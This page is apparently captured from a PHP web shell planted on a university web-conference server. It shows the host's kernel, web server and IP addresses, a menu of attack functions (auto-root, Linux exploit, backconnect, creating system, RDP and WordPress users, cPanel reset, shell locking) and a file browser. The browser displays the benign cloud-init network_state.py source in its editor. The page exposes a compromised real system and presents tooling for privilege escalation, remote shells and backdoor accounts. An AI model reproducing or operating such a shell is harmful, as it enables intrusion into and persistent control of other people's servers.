Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.138.32.110
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
cloudinit /
net /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
netops
[ DIR ]
drwxr-xr-x
__init__.py
41.92
KB
-rw-r--r--
activators.py
11.65
KB
-rw-r--r--
bsd.py
8.46
KB
-rw-r--r--
cmdline.py
9.13
KB
-rw-r--r--
dhcp.py
35.96
KB
-rw-r--r--
eni.py
20.88
KB
-rw-r--r--
ephemeral.py
21.5
KB
-rw-r--r--
freebsd.py
3.69
KB
-rw-r--r--
netbsd.py
1.41
KB
-rw-r--r--
netplan.py
20.73
KB
-rw-r--r--
network_manager.py
24.66
KB
-rw-r--r--
network_state.py
35.6
KB
-rw-r--r--
networkd.py
12.75
KB
-rw-r--r--
openbsd.py
2.48
KB
-rw-r--r--
renderer.py
1.64
KB
-rw-r--r--
renderers.py
1.78
KB
-rw-r--r--
sysconfig.py
43.97
KB
-rw-r--r--
udev.py
1.39
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : network_state.py
# Copyright (C) 2017 Canonical Ltd. # # Author: Ryan Harper <ryan.harper@canonical.com> # # This file is part of cloud-init. See LICENSE file for license information. import copy import functools import logging from typing import TYPE_CHECKING, Any, Dict, Optional from cloudinit import lifecycle, safeyaml, util from cloudinit.net import ( find_interface_name_from_mac, get_interfaces_by_mac, ipv4_mask_to_net_prefix, ipv6_mask_to_net_prefix, is_ip_network, is_ipv4_network, is_ipv6_address, is_ipv6_network, net_prefix_to_ipv4_mask, ) if TYPE_CHECKING: from cloudinit.net.renderer import Renderer LOG = logging.getLogger(__name__) NETWORK_STATE_VERSION = 1 NETWORK_STATE_REQUIRED_KEYS = { 1: ["version", "config", "network_state"], } NETWORK_V2_KEY_FILTER = [ "addresses", "dhcp4", "dhcp4-overrides", "dhcp6", "dhcp6-overrides", "gateway4", "gateway6", "interfaces", "match", "mtu", "nameservers", "renderer", "set-name", "wakeonlan", "accept-ra", "optional", ] NET_CONFIG_TO_V2: Dict[str, Dict[str, Any]] = { "bond": { "bond-ad-select": "ad-select", "bond-arp-interval": "arp-interval", "bond-arp-ip-target": "arp-ip-target", "bond-arp-validate": "arp-validate", "bond-downdelay": "down-delay", "bond-fail-over-mac": "fail-over-mac-policy", "bond-lacp-rate": "lacp-rate", "bond-miimon": "mii-monitor-interval", "bond-min-links": "min-links", "bond-mode": "mode", "bond-num-grat-arp": "gratuitous-arp", "bond-primary": "primary", "bond-primary-reselect": "primary-reselect-policy", "bond-updelay": "up-delay", "bond-xmit-hash-policy": "transmit-hash-policy", }, "bridge": { "bridge_ageing": "ageing-time", "bridge_bridgeprio": "priority", "bridge_fd": "forward-delay", "bridge_gcint": None, "bridge_hello": "hello-time", "bridge_maxage": "max-age", "bridge_maxwait": None, "bridge_pathcost": "path-cost", "bridge_portprio": "port-priority", "bridge_stp": "stp", "bridge_waitport": None, }, } def warn_deprecated_all_devices(dikt: dict) -> None: """Warn about deprecations of v2 properties for all devices""" if "gateway4" in dikt or "gateway6" in dikt: lifecycle.deprecate( deprecated="The use of `gateway4` and `gateway6`", deprecated_version="22.4", extra_message="For more info check out: " "https://docs.cloud-init.io/en/latest/topics/network-config-format-v2.html", # noqa: E501 ) def diff_keys(expected, actual): missing = set(expected) for key in actual: missing.discard(key) return missing class InvalidCommand(Exception): pass def ensure_command_keys(required_keys): def wrapper(func): @functools.wraps(func) def decorator(self, command, *args, **kwargs): if required_keys: missing_keys = diff_keys(required_keys, command) if missing_keys: raise InvalidCommand( "Command missing %s of required keys %s" % (missing_keys, required_keys) ) return func(self, command, *args, **kwargs) return decorator return wrapper class NetworkState: def __init__( self, network_state: dict, version: int = NETWORK_STATE_VERSION ): self._network_state = copy.deepcopy(network_state) self._version = version self.use_ipv6 = network_state.get("use_ipv6", False) self._has_default_route = None @property def config(self) -> dict: return self._network_state["config"] @property def version(self): return self._version @property def dns_nameservers(self): try: return self._network_state["dns"]["nameservers"] except KeyError: return [] @property def dns_searchdomains(self): try: return self._network_state["dns"]["search"] except KeyError: return [] @property def has_default_route(self): if self._has_default_route is None: self._has_default_route = self._maybe_has_default_route() return self._has_default_route def iter_interfaces(self, filter_func=None): ifaces = self._network_state.get("interfaces", {}) for iface in ifaces.values(): if filter_func is None: yield iface else: if filter_func(iface): yield iface def iter_routes(self, filter_func=None): for route in self._network_state.get("routes", []): if filter_func is not None: if filter_func(route): yield route else: yield route def _maybe_has_default_route(self): for route in self.iter_routes(): if self._is_default_route(route): return True for iface in self.iter_interfaces(): for subnet in iface.get("subnets", []): for route in subnet.get("routes", []): if self._is_default_route(route): return True return False def _is_default_route(self, route): default_nets = ("::", "0.0.0.0") return ( route.get("prefix") == 0 and route.get("network") in default_nets ) @classmethod def to_passthrough(cls, network_state: dict) -> "NetworkState": """Instantiates a `NetworkState` without interpreting its data. That means only `config` and `version` are copied. :param network_state: Network state data. :return: Instance of `NetworkState`. """ kwargs = {} if "version" in network_state: kwargs["version"] = network_state["version"] return cls({"config": network_state}, **kwargs) class NetworkStateInterpreter: initial_network_state = { "interfaces": {}, "routes": [], "dns": { "nameservers": [], "search": [], }, "use_ipv6": False, "config": None, } def __init__( self, version=NETWORK_STATE_VERSION, config=None, renderer: "Optional[Renderer]" = None, ): self._version = version self._config = config self._network_state = copy.deepcopy(self.initial_network_state) self._network_state["config"] = config self._parsed = False self._interface_dns_map: dict = {} self._renderer = renderer self.command_handlers = { "bond": self.handle_bond, "bonds": self.handle_bonds, "bridge": self.handle_bridge, "bridges": self.handle_bridges, "ethernets": self.handle_ethernets, "infiniband": self.handle_infiniband, "loopback": self.handle_loopback, "nameserver": self.handle_nameserver, "physical": self.handle_physical, "route": self.handle_route, "vlan": self.handle_vlan, "vlans": self.handle_vlans, "wifis": self.handle_wifis, } @property def network_state(self) -> NetworkState: from cloudinit.net.netplan import Renderer as NetplanRenderer if self._version == 2 and isinstance(self._renderer, NetplanRenderer): LOG.debug("Passthrough netplan v2 config") return NetworkState.to_passthrough(self._config) return NetworkState(self._network_state, version=self._version) @property def use_ipv6(self): return self._network_state.get("use_ipv6") @use_ipv6.setter def use_ipv6(self, val): self._network_state.update({"use_ipv6": val}) def dump(self): state = { "version": self._version, "config": self._config, "network_state": self._network_state, } return safeyaml.dumps(state) def load(self, state): if "version" not in state: LOG.error("Invalid state, missing version field") raise ValueError("Invalid state, missing version field") required_keys = NETWORK_STATE_REQUIRED_KEYS[state["version"]] missing_keys = diff_keys(required_keys, state) if missing_keys: msg = "Invalid state, missing keys: %s" % (missing_keys) LOG.error(msg) raise ValueError(msg) # v1 - direct attr mapping, except version for key in [k for k in required_keys if k not in ["version"]]: setattr(self, key, state[key]) def dump_network_state(self): return safeyaml.dumps(self._network_state) def as_dict(self): return {"version": self._version, "config": self._config} def parse_config(self, skip_broken=True): if self._version == 1: self.parse_config_v1(skip_broken=skip_broken) self._parsed = True elif self._version == 2: self.parse_config_v2(skip_broken=skip_broken) self._parsed = True def parse_config_v1(self, skip_broken=True): for command in self._config: command_type = command["type"] try: handler = self.command_handlers[command_type] except KeyError as e: raise RuntimeError( "No handler found for command '%s'" % command_type ) from e try: handler(command) except InvalidCommand: if not skip_broken: raise else: LOG.warning( "Skipping invalid command: %s", command, exc_info=True ) LOG.debug(self.dump_network_state()) for interface, dns in self._interface_dns_map.items(): iface = None try: iface = self._network_state["interfaces"][interface] except KeyError as e: raise ValueError( "Nameserver specified for interface {0}, " "but interface {0} does not exist!".format(interface) ) from e if iface: nameservers, search = dns iface["dns"] = { "nameservers": nameservers, "search": search, } def parse_config_v2(self, skip_broken=True): from cloudinit.net.netplan import Renderer as NetplanRenderer if isinstance(self._renderer, NetplanRenderer): # Nothing to parse as we are going to perform a Netplan passthrough return for command_type, command in self._config.items(): if command_type in ["version", "renderer"]: continue try: handler = self.command_handlers[command_type] except KeyError as e: raise RuntimeError( "No handler found for command '%s'" % command_type ) from e try: handler(command) self._v2_common(command) except InvalidCommand: if not skip_broken: raise else: LOG.warning( "Skipping invalid command: %s", command, exc_info=True ) LOG.debug(self.dump_network_state()) @ensure_command_keys(["name"]) def handle_loopback(self, command): return self.handle_physical(command) @ensure_command_keys(["name"]) def handle_physical(self, command): """ command = { 'type': 'physical', 'mac_address': 'c0:d6:9f:2c:e8:80', 'name': 'eth0', 'subnets': [ {'type': 'dhcp4'} ], 'accept-ra': 'true' } """ interfaces = self._network_state.get("interfaces", {}) iface = interfaces.get(command["name"], {}) for param, val in command.get("params", {}).items(): iface.update({param: val}) # convert subnet ipv6 netmask to cidr as needed subnets = _normalize_subnets(command.get("subnets")) # automatically set 'use_ipv6' if any addresses are ipv6 if not self.use_ipv6: for subnet in subnets: if subnet.get("type").endswith("6") or is_ipv6_address( subnet.get("address") ): self.use_ipv6 = True break accept_ra = command.get("accept-ra", None) if accept_ra is not None: accept_ra = util.is_true(accept_ra) wakeonlan = command.get("wakeonlan", None) if wakeonlan is not None: wakeonlan = util.is_true(wakeonlan) optional = command.get("optional", None) if optional is not None: optional = util.is_true(optional) iface.update( { "config_id": command.get("config_id"), "name": command.get("name"), "type": command.get("type"), "mac_address": command.get("mac_address"), "inet": "inet", "mode": "manual", "mtu": command.get("mtu"), "address": None, "gateway": None, "subnets": subnets, "accept-ra": accept_ra, "wakeonlan": wakeonlan, "optional": optional, } ) iface_key = command.get("config_id", command.get("name")) self._network_state["interfaces"].update({iface_key: iface}) self.dump_network_state() @ensure_command_keys(["name", "vlan_id", "vlan_link"]) def handle_vlan(self, command): """ auto eth0.222 iface eth0.222 inet static address 10.10.10.1 netmask 255.255.255.0 hwaddress ether BC:76:4E:06:96:B3 vlan-raw-device eth0 """ interfaces = self._network_state.get("interfaces", {}) self.handle_physical(command) iface = interfaces.get(command.get("name"), {}) iface["vlan-raw-device"] = command.get("vlan_link") iface["vlan_id"] = command.get("vlan_id") interfaces.update({iface["name"]: iface}) @ensure_command_keys(["name", "bond_interfaces", "params"]) def handle_bond(self, command): """ #/etc/network/interfaces auto eth0 iface eth0 inet manual bond-master bond0 bond-mode 802.3ad auto eth1 iface eth1 inet manual bond-master bond0 bond-mode 802.3ad auto bond0 iface bond0 inet static address 192.168.0.10 gateway 192.168.0.1 netmask 255.255.255.0 bond-slaves none bond-mode 802.3ad bond-miimon 100 bond-downdelay 200 bond-updelay 200 bond-lacp-rate 4 """ self.handle_physical(command) interfaces = self._network_state.get("interfaces") iface = interfaces.get(command.get("name"), {}) for param, val in command.get("params").items(): iface.update({param: val}) iface.update({"bond-slaves": "none"}) self._network_state["interfaces"].update({iface["name"]: iface}) # handle bond slaves for ifname in command.get("bond_interfaces"): if ifname not in interfaces: cmd = { "name": ifname, "type": "bond", } # inject placeholder self.handle_physical(cmd) interfaces = self._network_state.get("interfaces", {}) bond_if = interfaces.get(ifname) bond_if["bond-master"] = command.get("name") # copy in bond config into slave for param, val in command.get("params").items(): bond_if.update({param: val}) self._network_state["interfaces"].update({ifname: bond_if}) @ensure_command_keys(["name", "bridge_interfaces"]) def handle_bridge(self, command): """ auto br0 iface br0 inet static address 10.10.10.1 netmask 255.255.255.0 bridge_ports eth0 eth1 bridge_stp off bridge_fd 0 bridge_maxwait 0 bridge_params = [ "bridge_ports", "bridge_ageing", "bridge_bridgeprio", "bridge_fd", "bridge_gcint", "bridge_hello", "bridge_hw", "bridge_maxage", "bridge_maxwait", "bridge_pathcost", "bridge_portprio", "bridge_stp", "bridge_waitport", ] """ # find one of the bridge port ifaces to get mac_addr # handle bridge_slaves interfaces = self._network_state.get("interfaces", {}) for ifname in command.get("bridge_interfaces"): if ifname in interfaces: continue cmd = { "name": ifname, } # inject placeholder self.handle_physical(cmd) interfaces = self._network_state.get("interfaces", {}) self.handle_physical(command) iface = interfaces.get(command.get("name"), {}) iface["bridge_ports"] = command["bridge_interfaces"] for param, val in command.get("params", {}).items(): iface.update({param: val}) # convert value to boolean bridge_stp = iface.get("bridge_stp") if bridge_stp is not None and not isinstance(bridge_stp, bool): if bridge_stp in ["on", "1", 1]: bridge_stp = True elif bridge_stp in ["off", "0", 0]: bridge_stp = False else: raise ValueError( "Cannot convert bridge_stp value ({stp}) to" " boolean".format(stp=bridge_stp) ) iface.update({"bridge_stp": bridge_stp}) interfaces.update({iface["name"]: iface}) @ensure_command_keys(["name"]) def handle_infiniband(self, command): self.handle_physical(command) def _parse_dns(self, command): nameservers = [] search = [] if "address" in command: addrs = command["address"] if not isinstance(addrs, list): addrs = [addrs] for addr in addrs: nameservers.append(addr) if "search" in command: paths = command["search"] if not isinstance(paths, list): paths = [paths] for path in paths: search.append(path) return nameservers, search @ensure_command_keys(["address"]) def handle_nameserver(self, command): dns = self._network_state.get("dns") nameservers, search = self._parse_dns(command) if "interface" in command: self._interface_dns_map[command["interface"]] = ( nameservers, search, ) else: dns["nameservers"].extend(nameservers) dns["search"].extend(search) @ensure_command_keys(["address"]) def _handle_individual_nameserver(self, command, iface): _iface = self._network_state.get("interfaces") nameservers, search = self._parse_dns(command) _iface[iface]["dns"] = {"nameservers": nameservers, "search": search} @ensure_command_keys(["destination"]) def handle_route(self, command): self._network_state["routes"].append(_normalize_route(command)) # V2 handlers def handle_bonds(self, command): """ v2_command = { bond0: { 'interfaces': ['interface0', 'interface1'], 'parameters': { 'mii-monitor-interval': 100, 'mode': '802.3ad', 'xmit_hash_policy': 'layer3+4'}}, bond1: { 'bond-slaves': ['interface2', 'interface7'], 'parameters': { 'mode': 1, } } } v1_command = { 'type': 'bond' 'name': 'bond0', 'bond_interfaces': [interface0, interface1], 'params': { 'bond-mode': '802.3ad', 'bond_miimon: 100, 'bond_xmit_hash_policy': 'layer3+4', } } """ self._handle_bond_bridge(command, cmd_type="bond") def handle_bridges(self, command): """ v2_command = { br0: { 'interfaces': ['interface0', 'interface1'], 'forward-delay': 0, 'stp': False, 'maxwait': 0, } } v1_command = { 'type': 'bridge' 'name': 'br0', 'bridge_interfaces': [interface0, interface1], 'params': { 'bridge_stp': 'off', 'bridge_fd: 0, 'bridge_maxwait': 0 } } """ self._handle_bond_bridge(command, cmd_type="bridge") def handle_ethernets(self, command): """ ethernets: eno1: match: macaddress: 00:11:22:33:44:55 driver: hv_netvsc wakeonlan: true dhcp4: true dhcp6: false addresses: - 192.168.14.2/24 - 2001:1::1/64 gateway4: 192.168.14.1 gateway6: 2001:1::2 nameservers: search: [foo.local, bar.local] addresses: [8.8.8.8, 8.8.4.4] lom: match: driver: ixgbe set-name: lom1 dhcp6: true accept-ra: true switchports: match: name: enp2* mtu: 1280 command = { 'type': 'physical', 'mac_address': 'c0:d6:9f:2c:e8:80', 'name': 'eth0', 'subnets': [ {'type': 'dhcp4'} ] } """ # Get the interfaces by MAC address to update an interface's # device name to the name of the device that matches a provided # MAC address when the set-name directive is not present. # # Please see https://bugs.launchpad.net/cloud-init/+bug/1855945 # for more information. ifaces_by_mac = get_interfaces_by_mac() for eth, cfg in command.items(): phy_cmd = { "config_id": eth, "type": "physical", } match = cfg.get("match", {}) mac_address = match.get("macaddress", None) if not mac_address: LOG.debug( 'NetworkState Version2: missing "macaddress" info ' "in config entry: %s: %s", eth, str(cfg), ) phy_cmd["mac_address"] = mac_address # Determine the name of the interface by using one of the # following in the order they are listed: # * set-name # * interface name looked up by mac # * value of "eth" key from this loop name = eth set_name = cfg.get("set-name") if set_name: name = set_name elif mac_address and ifaces_by_mac: lcase_mac_address = mac_address.lower() mac = find_interface_name_from_mac(lcase_mac_address) if mac: name = mac phy_cmd["name"] = name driver = match.get("driver", None) if driver: phy_cmd["params"] = {"driver": driver} for key in ["mtu", "match", "wakeonlan", "accept-ra", "optional"]: if key in cfg: phy_cmd[key] = cfg[key] warn_deprecated_all_devices(cfg) subnets = self._v2_to_v1_ipcfg(cfg) if len(subnets) > 0: phy_cmd.update({"subnets": subnets}) LOG.debug("v2(ethernets) -> v1(physical):\n%s", phy_cmd) self.handle_physical(phy_cmd) def handle_vlans(self, command): """ v2_vlans = { 'eth0.123': { 'id': 123, 'link': 'eth0', 'dhcp4': True, } } v1_command = { 'type': 'vlan', 'name': 'eth0.123', 'vlan_link': 'eth0', 'vlan_id': 123, 'subnets': [{'type': 'dhcp4'}], } """ for vlan, cfg in command.items(): vlan_cmd = { "type": "vlan", "name": vlan, "vlan_id": cfg.get("id"), "vlan_link": cfg.get("link"), } if "mtu" in cfg: vlan_cmd["mtu"] = cfg["mtu"] warn_deprecated_all_devices(cfg) subnets = self._v2_to_v1_ipcfg(cfg) if len(subnets) > 0: vlan_cmd.update({"subnets": subnets}) LOG.debug("v2(vlans) -> v1(vlan):\n%s", vlan_cmd) self.handle_vlan(vlan_cmd) def handle_wifis(self, command): LOG.warning( "Wifi configuration is only available to distros with" " netplan rendering support." ) def _v2_common(self, cfg) -> None: LOG.debug("v2_common: handling config:\n%s", cfg) for iface, dev_cfg in cfg.items(): if "nameservers" in dev_cfg: search = dev_cfg.get("nameservers").get("search") dns = dev_cfg.get("nameservers").get("addresses") name_cmd = {"type": "nameserver"} if search: name_cmd["search"] = search if dns: name_cmd["address"] = dns self._handle_individual_nameserver(name_cmd, iface) def _handle_bond_bridge(self, command, cmd_type=None): """Common handler for bond and bridge types""" # inverse mapping for v2 keynames to v1 keynames v2key_to_v1 = dict( (v, k) for k, v in NET_CONFIG_TO_V2.get(cmd_type).items() ) for item_name, item_cfg in command.items(): item_params = dict( (key, value) for (key, value) in item_cfg.items() if key not in NETWORK_V2_KEY_FILTER ) # We accept both spellings (as netplan does). LP: #1756701 # Normalize internally to the new spelling: params = item_params.get("parameters", {}) grat_value = params.pop("gratuitious-arp", None) if grat_value: params["gratuitous-arp"] = grat_value v1_cmd = { "type": cmd_type, "name": item_name, cmd_type + "_interfaces": item_cfg.get("interfaces"), "params": dict((v2key_to_v1[k], v) for k, v in params.items()), } if "mtu" in item_cfg: v1_cmd["mtu"] = item_cfg["mtu"] warn_deprecated_all_devices(item_cfg) subnets = self._v2_to_v1_ipcfg(item_cfg) if len(subnets) > 0: v1_cmd.update({"subnets": subnets}) LOG.debug("v2(%s) -> v1(%s):\n%s", cmd_type, cmd_type, v1_cmd) if cmd_type == "bridge": self.handle_bridge(v1_cmd) elif cmd_type == "bond": self.handle_bond(v1_cmd) else: raise ValueError( "Unknown command type: {cmd_type}".format( cmd_type=cmd_type ) ) def _v2_to_v1_ipcfg(self, cfg): """Common ipconfig extraction from v2 to v1 subnets array.""" def _add_dhcp_overrides(overrides, subnet): if "route-metric" in overrides: subnet["metric"] = overrides["route-metric"] subnets = [] if cfg.get("dhcp4"): subnet = {"type": "dhcp4"} _add_dhcp_overrides(cfg.get("dhcp4-overrides", {}), subnet) subnets.append(subnet) if cfg.get("dhcp6"): subnet = {"type": "dhcp6"} self.use_ipv6 = True _add_dhcp_overrides(cfg.get("dhcp6-overrides", {}), subnet) subnets.append(subnet) gateway4 = None gateway6 = None nameservers = {} for address in cfg.get("addresses", []): subnet = { "type": "static", "address": address, } if ":" in address: if "gateway6" in cfg and gateway6 is None: gateway6 = cfg.get("gateway6") subnet.update({"gateway": gateway6}) else: if "gateway4" in cfg and gateway4 is None: gateway4 = cfg.get("gateway4") subnet.update({"gateway": gateway4}) if "nameservers" in cfg and not nameservers: addresses = cfg.get("nameservers").get("addresses") if addresses: nameservers["dns_nameservers"] = addresses search = cfg.get("nameservers").get("search") if search: nameservers["dns_search"] = search subnet.update(nameservers) subnets.append(subnet) routes = [] for route in cfg.get("routes", []): routes.append( _normalize_route( { "destination": route.get("to"), "gateway": route.get("via"), "metric": route.get("metric"), "mtu": route.get("mtu"), } ) ) # v2 routes are bound to the interface, in v1 we add them under # the first subnet since there isn't an equivalent interface level. if len(subnets) and len(routes): subnets[0]["routes"] = routes return subnets def _normalize_subnet(subnet): # Prune all keys with None values. subnet = copy.deepcopy(subnet) normal_subnet = dict((k, v) for k, v in subnet.items() if v) if subnet.get("type") in ("static", "static6"): normal_subnet.update( _normalize_net_keys( normal_subnet, address_keys=( "address", "ip_address", ), ) ) normal_subnet["routes"] = [ _normalize_route(r) for r in subnet.get("routes", []) ] def listify(snet, name): if name in snet and not isinstance(snet[name], list): snet[name] = snet[name].split() for k in ("dns_search", "dns_nameservers"): listify(normal_subnet, k) return normal_subnet def _normalize_net_keys(network, address_keys=()): """Normalize dictionary network keys returning prefix and address keys. @param network: A dict of network-related definition containing prefix, netmask and address_keys. @param address_keys: A tuple of keys to search for representing the address or cidr. The first address_key discovered will be used for normalization. @returns: A dict containing normalized prefix and matching addr_key. """ net = {k: v for k, v in network.items() if v or v == 0} addr_key = None for key in address_keys: if net.get(key): addr_key = key break if not addr_key: message = "No config network address keys [%s] found in %s" % ( ",".join(address_keys), network, ) LOG.error(message) raise ValueError(message) addr = str(net.get(addr_key)) if not is_ip_network(addr): LOG.error("Address %s is not a valid ip network", addr) raise ValueError(f"Address {addr} is not a valid ip address") ipv6 = is_ipv6_network(addr) ipv4 = is_ipv4_network(addr) netmask = net.get("netmask") if "/" in addr: addr_part, _, maybe_prefix = addr.partition("/") net[addr_key] = addr_part if ipv6: # this supports input of ffff:ffff:ffff:: prefix = ipv6_mask_to_net_prefix(maybe_prefix) elif ipv4: # this supports input of 255.255.255.0 prefix = ipv4_mask_to_net_prefix(maybe_prefix) else: # In theory this never happens, is_ip_network() should catch all # invalid networks LOG.error("Address %s is not a valid ip network", addr) raise ValueError(f"Address {addr} is not a valid ip address") elif "prefix" in net: prefix = int(net["prefix"]) elif netmask and ipv4: prefix = ipv4_mask_to_net_prefix(netmask) elif netmask and ipv6: prefix = ipv6_mask_to_net_prefix(netmask) else: prefix = 64 if ipv6 else 24 if "prefix" in net and str(net["prefix"]) != str(prefix): LOG.warning( "Overwriting existing 'prefix' with '%s' in network info: %s", prefix, net, ) net["prefix"] = prefix if ipv6: # TODO: we could/maybe should add this back with the very uncommon # 'netmask' for ipv6. We need a 'net_prefix_to_ipv6_mask' for that. if "netmask" in net: del net["netmask"] elif ipv4: net["netmask"] = net_prefix_to_ipv4_mask(net["prefix"]) return net def _normalize_route(route): """normalize a route. return a dictionary with only: 'type': 'route' (only present if it was present in input) 'network': the network portion of the route as a string. 'prefix': the network prefix for address as an integer. 'metric': integer metric (only if present in input). 'netmask': netmask (string) equivalent to prefix iff network is ipv4. """ # Prune None-value keys. Specifically allow 0 (a valid metric). normal_route = dict( (k, v) for k, v in route.items() if v not in ("", None) ) if "destination" in normal_route: normal_route["network"] = normal_route["destination"] del normal_route["destination"] normal_route.update( _normalize_net_keys( normal_route, address_keys=("network", "destination") ) ) metric = normal_route.get("metric") if metric: try: normal_route["metric"] = int(metric) except ValueError as e: raise TypeError( "Route config metric {} is not an integer".format(metric) ) from e return normal_route def _normalize_subnets(subnets): if not subnets: subnets = [] return [_normalize_subnet(s) for s in subnets] def parse_net_config_data( net_config: dict, skip_broken: bool = True, renderer=None, # type: Optional[Renderer] ) -> NetworkState: """Parses the config, returns NetworkState object :param net_config: curtin network config dict """ state = None version = net_config.get("version") config = net_config.get("config") if version == 2: # v2 does not have explicit 'config' key so we # pass the whole net-config as-is config = net_config if version and config is not None: nsi = NetworkStateInterpreter( version=version, config=config, renderer=renderer ) nsi.parse_config(skip_broken=skip_broken) state = nsi.network_state if not state: raise RuntimeError( "No valid network_state object created from network config. " "Did you specify the correct version? Network config:\n" f"{net_config}" ) return state
Close